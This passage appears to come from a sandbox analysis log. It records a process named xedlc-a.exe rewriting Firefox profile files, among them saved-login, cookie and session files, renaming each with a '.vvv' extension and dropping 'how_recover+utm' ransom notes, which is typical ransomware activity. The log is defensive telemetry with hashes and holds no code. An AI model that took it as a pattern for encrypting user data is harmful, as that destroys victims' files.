- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778376
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 85430
- mode: close
- sequenceNumber: 1411
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\extensions\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778376
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85439
- mode: created
- sequenceNumber: 1412
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\minidumps\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778377
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 85445
- mode: close
- sequenceNumber: 1413
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\minidumps\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778377
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85453
- mode: created
- sequenceNumber: 1414
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\minidumps\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778378
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 85461
- mode: close
- sequenceNumber: 1415
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\minidumps\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778378
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85470
- mode: open
- sequenceNumber: 1416
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\prefs.js
- filesize: 6344
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 2814749767161115
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 85504
- mode: close
- sequenceNumber: 1417
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\prefs.js
- filesize: 6766
- md5sum: 9e045e59159857ae73251d67dfa25c9e
- sha1sum: 376ee1f898ae9ff83456a0bf5d1e45d0a3b1586b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 2814749767161115
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85514
- mode: rename
- sequenceNumber: 1418
- filesize: 6766
- md5sum: 9e045e59159857ae73251d67dfa25c9e
- sha1sum: 376ee1f898ae9ff83456a0bf5d1e45d0a3b1586b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\prefs.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\prefs.js.vvv
- ads:
- fid (ads:): 2814749767161115
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85523
- mode: open
- sequenceNumber: 1419
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\sessionstore.js
- filesize: 110
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1407374883608187
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 85530
- mode: close
- sequenceNumber: 1420
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\sessionstore.js
- filesize: 526
- md5sum: 28699ae747f679dd53eec9817425e2d4
- sha1sum: 3224dd3ae179fea7cf4779c1fd113ab7e5d44edb
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1407374883608187
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85540
- mode: rename
- sequenceNumber: 1421
- filesize: 526
- md5sum: 28699ae747f679dd53eec9817425e2d4
- sha1sum: 3224dd3ae179fea7cf4779c1fd113ab7e5d44edb
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\sessionstore.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\sessionstore.js.vvv
- ads:
- fid (ads:): 1407374883608187
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85549
- mode: open
- sequenceNumber: 1422
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\signons2.txt
- filesize: 157
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953478841
- ntstatus: 0x0
- CreateOptions: 0x200000
- file:
- timestamp: 85557
- mode: close
- sequenceNumber: 1423
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\signons2.txt
- filesize: 574
- md5sum: 313389f8531ac24cf5485ce138b374dc
- sha1sum: 435d0c887db8b3cca6e633400ea91e7dc867c8c8
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953478841
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85569
- mode: rename
- sequenceNumber: 1424
- filesize: 574
- md5sum: 313389f8531ac24cf5485ce138b374dc
- sha1sum: 435d0c887db8b3cca6e633400ea91e7dc867c8c8
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\signons2.txt
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\signons2.txt.vvv
- ads:
- fid (ads:): 562949953478841
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85577
- mode: open
- sequenceNumber: 1425
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\signons3.txt
- filesize: 157
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953478842
- ntstatus: 0x0
- CreateOptions: 0x200000
- file:
- timestamp: 85587
- mode: close
- sequenceNumber: 1426
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\signons3.txt
- filesize: 574
- md5sum: 313389f8531ac24cf5485ce138b374dc
- sha1sum: 435d0c887db8b3cca6e633400ea91e7dc867c8c8
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953478842
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85598
- mode: rename
- sequenceNumber: 1427
- filesize: 574
- md5sum: 313389f8531ac24cf5485ce138b374dc
- sha1sum: 435d0c887db8b3cca6e633400ea91e7dc867c8c8
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\signons3.txt
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\signons3.txt.vvv
- ads:
- fid (ads:): 562949953478842
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85610
- mode: created
- sequenceNumber: 1428
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778379
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 85618
- mode: close
- sequenceNumber: 1429
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778379
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85626
- mode: created
- sequenceNumber: 1430
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778380
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 85633
- mode: close
- sequenceNumber: 1431
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\71fgjoc5.kl7wec5z.default\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778380
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85643
- mode: created
- sequenceNumber: 1432
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\bookmarkbackups\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778381
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 85649
- mode: close
- sequenceNumber: 1433
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\bookmarkbackups\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778381
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85680
- mode: created
- sequenceNumber: 1434
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\bookmarkbackups\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778382
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 85687
- mode: close
- sequenceNumber: 1435
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\bookmarkbackups\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778382
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85696
- mode: open
- sequenceNumber: 1436
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\chrome\userChrome-example.css
- filesize: 959
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1125899906897165
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 85737
- mode: close
- sequenceNumber: 1437
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\chrome\userChrome-example.css
- filesize: 1374
- md5sum: eec0ce1de6f93854c185d9e02f849c75
- sha1sum: 8498e8fb19dc5e881a140b560366fcbd93f86595
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1125899906897165
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85747
- mode: rename
- sequenceNumber: 1438
- filesize: 1374
- md5sum: eec0ce1de6f93854c185d9e02f849c75
- sha1sum: 8498e8fb19dc5e881a140b560366fcbd93f86595
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\chrome\userChrome-example.css
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\chrome\userChrome-example.css.vvv
- ads:
- fid (ads:): 1125899906897165
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85756
- mode: open
- sequenceNumber: 1439
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\chrome\userContent-example.css
- filesize: 663
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1125899906897166
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 85763
- mode: close
- sequenceNumber: 1440
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\chrome\userContent-example.css
- filesize: 1086
- md5sum: ae02d7d05a161690eaf51a8f31642b55
- sha1sum: 7e9eda5d3836bff446886164eeb0c5e8c50f1e7d
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1125899906897166
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85774
- mode: rename
- sequenceNumber: 1441
- filesize: 1086
- md5sum: ae02d7d05a161690eaf51a8f31642b55
- sha1sum: 7e9eda5d3836bff446886164eeb0c5e8c50f1e7d
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\chrome\userContent-example.css
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\chrome\userContent-example.css.vvv
- ads:
- fid (ads:): 1125899906897166
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85835
- mode: created
- sequenceNumber: 1442
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\chrome\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778383
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 85841
- mode: close
- sequenceNumber: 1443
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\chrome\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778383
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85851
- mode: created
- sequenceNumber: 1444
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\chrome\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778384
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 85859
- mode: close
- sequenceNumber: 1445
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\chrome\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778384
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85868
- mode: open
- sequenceNumber: 1446
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\cookies.txt
- filesize: 157
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953478852
- ntstatus: 0x0
- CreateOptions: 0x200000
- file:
- timestamp: 85878
- mode: close
- sequenceNumber: 1447
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\cookies.txt
- filesize: 574
- md5sum: 313389f8531ac24cf5485ce138b374dc
- sha1sum: 435d0c887db8b3cca6e633400ea91e7dc867c8c8
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953478852
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85890
- mode: rename
- sequenceNumber: 1448
- filesize: 574
- md5sum: 313389f8531ac24cf5485ce138b374dc
- sha1sum: 435d0c887db8b3cca6e633400ea91e7dc867c8c8
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\cookies.txt
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\cookies.txt.vvv
- ads:
- fid (ads:): 562949953478852
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85904
- mode: open
- sequenceNumber: 1449
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\bootstrap.js
- filesize: 605
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1688849860318743
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 85933
- mode: close
- sequenceNumber: 1450
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\bootstrap.js
- filesize: 1022
- md5sum: b913116640df8332574795d0adee78de
- sha1sum: 1e3f576b357cd12888687d6bdcb4b1a783fad34c
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1688849860318743
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85947
- mode: rename
- sequenceNumber: 1451
- filesize: 1022
- md5sum: b913116640df8332574795d0adee78de
- sha1sum: 1e3f576b357cd12888687d6bdcb4b1a783fad34c
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\bootstrap.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\bootstrap.js.vvv
- ads:
- fid (ads:): 1688849860318743
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 85961
- mode: open
- sequenceNumber: 1452
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\components\inlinedisposition.js
- filesize: 3770
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 2251799813740112
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 86547
- mode: close
- sequenceNumber: 1453
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\components\inlinedisposition.js
- filesize: 4190
- md5sum: af25b55db4ab05d800593cfb02532a01
- sha1sum: 1b060c0d8c71d218508d6841cf3a03010917387b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 2251799813740112
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 86559
- mode: rename
- sequenceNumber: 1454
- filesize: 4190
- md5sum: af25b55db4ab05d800593cfb02532a01
- sha1sum: 1b060c0d8c71d218508d6841cf3a03010917387b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\components\inlinedisposition.js
- new_name: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\components\inlinedisposition.js.vvv
- ads:
- fid (ads:): 2251799813740112
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 86570
- mode: created
- sequenceNumber: 1455
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\components\how_recover+utm.txt
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778385
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 86577
- mode: close
- sequenceNumber: 1456
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\components\how_recover+utm.txt
- filesize: 2682
- md5sum: dbb0eda595eb83a05d3bc771ae2561a4
- sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778385
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 86726
- mode: created
- sequenceNumber: 1457
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\components\how_recover+utm.html
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778386
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 86733
- mode: close
- sequenceNumber: 1458
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\components\how_recover+utm.html
- filesize: 9495
- md5sum: 95f596a25dff51b6af2042b1bbe02985
- sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 281474976778386
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 86742
- mode: open
- sequenceNumber: 1459
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\license.txt
- filesize: 1442
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1125899906897485
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 86804
- mode: close
- sequenceNumber: 1460
- value: C:\Documents and Settings\admin\Application Data\Mozilla\Firefox\Profiles\me5po3fs.5zf4ji1b.default\extensions\{123647d5-da43-4344-bfe2-fc093bdf8f5e}\license.txt
- filesize: 1870
- md5sum: a00d345060f1beda4324fc4dbb3228fc
- sha1sum: f486f297a818b14e964e52adaa801d6c37125a2b
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1125899906897485
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 86815
- mode: rename
- sequenceNumber: 1461
- filesize: 1870
- md5sum: a00d345060f1beda4324fc4dbb3228fc
